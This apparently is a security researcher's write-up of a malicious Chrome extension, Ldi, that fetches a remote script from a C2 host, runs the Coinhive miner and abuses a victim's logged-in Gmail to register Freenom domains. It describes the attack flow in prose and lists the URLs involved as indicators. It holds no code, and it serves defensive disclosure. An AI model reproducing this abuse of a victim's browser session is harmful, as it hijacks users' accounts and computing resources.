With Chrome being the most widely used web browser, attackers are starting to develop more advanced and malicious extensions for it every day. Whether it's impersonating popular extensions to deliver ads, hijacking search queries, or injecting the CoinHive browser miner, it is easy to see that malicious extensions are on the rise.
The extension we are going to look at today, called Ldi, takes it to the next level when it comes to malicious behavior. This is because it not only loads the Coinhive browser miner into a victim's browser and uses up all the CPU, but it also uses that victim's Gmail account to register free domains for the attackers using Freenom.
When I dug down further and examined the source, though, it was obvious that this was not our garden variety unwanted extension.
Currently, the remote script that is sent back to be executed is http://fbcdnxy.net/coobgpohoikkiipiblmjeljniedjpjpf/remote-postal-code.json. This script is the meat of the extension and will perform the various malicious activities such as loading Coinhive and registering domains through your Gmail account.
Once the browser starts, the above malicious script is executed and the fun begins.
First, the extension will connect to Facebook. While I did not see it do anything other than connect, there is quite a lot of code dedicated to Facebook, which could be for spreading the extension via Facebook Messenger. Unfortunately, I did not have the time to review that part of the code as much as I would have liked.
The extension now quickly loads Coinhive so that the browser begins mining Monero for the developer.
After that, it begins the process of registering domain names using your Gmail account. First it connects to Freenom.com by POSTing to the the URL https://my.freenom.com/includes/domains/fn-available.php and checking if a random named domain and various TLDs are available to register. In this example, it was checking to see what was available for the string "jihafivagobumini".
Once it retrieves the available domain options, it adds each of those domains to a cart using the URL https://my.freenom.com/includes/domains/fn-additional.php.
When done adding the domains, it starts the checkout process, but needs an email address and information to register the domains under. To get the email address, it connects to the URL https://mail.google.com/mail/u/0/h/1pq68r75kdvdr/?v=lui to switch a logged in Gmail account to Gmail HTML view. This allows it to retrieve the email address of the logged in user. If a user is not logged into Gmail, then this extension is unable to register the domains.
It then connects to https://randomuser.me/api/0.4/?randomapi in order to generate random registration information that can be used during the checkout.
Now that it has both an email address and random registration information, it finishes the checkout process at Freenom. In order to finish the registration process, though, the victim has to confirm their email address. The extension is clever, though, as it checks the Gmail account and automatically opens the verification link for you.
This will result in 4 domains being generated for the extension developer, but registered with the victims Gmail address. This is done each time the extension is installed in Chrome.
Now that the domains have been registered it sends this information back to the C2 server at http://fbcdnxy.net/.
At this time it is not known what these domains are being used for, but they could easily be used to distribute malware, further spread the extension, or for phishing campaigns. Whatever they are used for, with each victim registering 4 domains for the developer, and some malicious extensions having hundreds, if not thousands, of users, this quickly adds up to a huge arsenal of domains for the attacker.
As I, and others, research this extension further I will update this article with any relevant information that is discovered.
http://fbcdnxy.net/ http://fairexttrades.com/ https://my.freenom.com/ https://www.facebook.com/ https://coinhive.com/ https://mail.google.com/mail/ https://randomuser.me/